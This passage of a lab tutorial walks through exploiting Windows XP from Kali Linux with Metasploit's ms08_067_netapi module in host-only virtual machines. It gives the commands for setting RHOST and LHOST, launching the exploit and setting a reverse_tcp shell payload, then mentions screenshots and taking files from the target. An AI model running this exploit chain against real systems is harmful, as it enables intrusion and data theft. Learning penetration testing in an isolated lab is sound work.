Then, choose Host-only as your network connection.
After you click OK, go to your Windows XP in Kali Linux and click VM in the Settings option again, but this time you choose custom and target it to your host-only virtual network.
Then, I want to set a new IP address in my Kali Linux that will be used later as my local host or LHOST. Type sudo ifconfig eth0:0 (or any other name for your interface card) <your desired IP address> netmask <your desired netmask> in your terminal. To test if the connection between both networks js already established, we can test that by ping the other computer. If it replies with 0% packet loss, then the connection has successfully set up.
If you do not know your Windows XP’s IP address, check it by typing ipconfig in your command prompt.
Now that I have already established the connection between two host-only networks. We can start preparing for the exploitation step.
First thing first, let’s start the Metasploit application by typing msfconsole in your Terminal.
Metasploit offers more than 1500 exploits package that we can use on different targets. To check what are the existing exploits you can type show exploits and the list of exploits with their descriptions will show up. Metasploit also updates and keep adding more packages from time to time so make sure you update the app regularly.
In this post, I am going to utilize the Microsoft Service Relative Path Stack Corruption vulnerability in Windows XP or better knows as netapi as my entrance. Type use windows/smb/ms08_067_netapi.
The next thing to do is to set up the LHOST (Local Host) and RHOST (Remote Host). In this case, Kali Linux is the local host and Windows XP is the remote host.
In order to set the RHOST & LHOST, type set RHOST/LHOST <IP address>
Now, the only thing to do is to start the exploitation process by typing the exploit command.
Now you might be wondering what all the things that we can do at this step. You can find out all that with help command, it will show you the list of stuff that we can execute.
To check if this is the right target that I want to exploit, I tried to execute the screenshot command. The screenshot command will capture the screen of the target at the very exact moment.
There are still so many things that we can do other than screenshot the target’s screen. But, during a penetration testing, our goal is to get a shell access so that we can get the full control of the computer.
In this netapi vulnerability, we can execute shell command to get the shell access.
Or you can set the payload first before you exploit the target, by typing set PAYLOAD windows/shell/reverse_tcpPAYLOAD => windows/shell/reverse_tcp
Now that we got the shell access, we can do just about anything with the computer, for example, get some important file from the target’s computer.